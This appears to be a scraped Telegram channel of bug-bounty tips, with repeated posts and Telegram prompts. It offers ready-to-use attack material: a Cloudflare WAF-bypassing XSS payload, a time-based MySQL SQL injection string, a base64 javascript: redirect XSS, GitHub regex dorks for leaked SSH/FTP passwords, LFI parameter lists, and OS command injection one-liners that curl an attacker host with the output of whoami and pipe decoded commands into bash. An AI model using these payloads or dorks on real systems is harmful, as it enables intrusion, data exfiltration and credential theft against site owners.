ffuf - Fuzz Faster U Fool
A fast web fuzzer written in Go.
Installation
Download a prebuilt binary from releases page, unpack and run!
or
If you are on macOS with homebrew, ffuf can be installed with:
If you have recent go compiler installed:
or
GitHub
#Web #InfoSec #Fuzzer
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
A fast web fuzzer written in Go.
Installation
Download a prebuilt binary from releases page, unpack and run!
or
If you are on macOS with homebrew, ffuf can be installed with:
brew install ffufor
If you have recent go compiler installed:
go install github.com/ffuf/ffuf/v2@latest(the same command works for updating)
or
git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go buildFfuf depends on Go 1.16 or greater.
GitHub
#Web #InfoSec #Fuzzer
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
⚡2
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!
Eg, find SSH and FTP passwords via connection strings with:
#infosec #cybersecurite #bugbountytip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/ /ftp:\/\/.*:.*@.*target\.com/ #infosec #cybersecurite #bugbountytip
Please open Telegram to view this post
VIEW IN TELEGRAM
Bypass Cloudflare WAF (XSS without parentheses)
#xss #bugbountytips #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
javascript:var{a:onerror}={a:alert};throw%20document.domain#xss #bugbountytips #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡1❤1🔥1
,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW
MySQL
#bugbountytip #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👎2⚡1🔥1
I found a url like this :
encoded javascript:alert("Xss by vikas") to base64 like :
Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`
📘 Twitter
#bugbounty #xss #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
https://domain.io/redirect?url=some_base_64_encoded_stringencoded javascript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`
#bugbounty #xss #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥2⚡1🤣1
JSON Smuggling: A far-fetched intrusion detection evasion technique
🔗 Medium
#infosec #cybersecurity #blueteam
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
#infosec #cybersecurity #blueteam
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1🔥1
LFI Vulnerability Testing: Key Parameters
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
⚡2❤1🔥1
OS Command Injection ⚔️
#InfoSec #CyberSec #BugBounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
curl${IFS}$(whoami).atckrecho${IFS}Y3VybCBodHRwOi8vdTBfYTIxNS1sb2NhbGhvc3QuYXR0YWNrZXIK|base64${IFS}-d|bashcurl${IFS}atckr?$(whoami)echo${IFS}Y3VybCBodHRwOi8vYXR0YWNrZXI/dTBfYTIxNT1sb2NhbGhvc3QK|base64${IFS}-d|bash#InfoSec #CyberSec #BugBounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1🎃1
🔥 [remote] Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass
Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass
🔗 Read / Download
#BugCod3 #security #bugbounty #infosec
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass
🔗 Read / Download
#BugCod3 #security #bugbounty #infosec
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
❤2⚡2🔥2
How this seasoned bug bounty hunter combines Burp Suite and HackerOne to uncover high-impact vulnerabilities
Arman S., a full-time independent security researcher and bug bounty hunter, talked us through how he uses Burp Suite Professional and HackerOne in tandem to find and report high-value security vulner
🔗 Read more
#BugCod3 #security #bugbounty #infosec #portswigger
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Arman S., a full-time independent security researcher and bug bounty hunter, talked us through how he uses Burp Suite Professional and HackerOne in tandem to find and report high-value security vulner
🔗 Read more
#BugCod3 #security #bugbounty #infosec #portswigger
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
⚡1❤1🔥1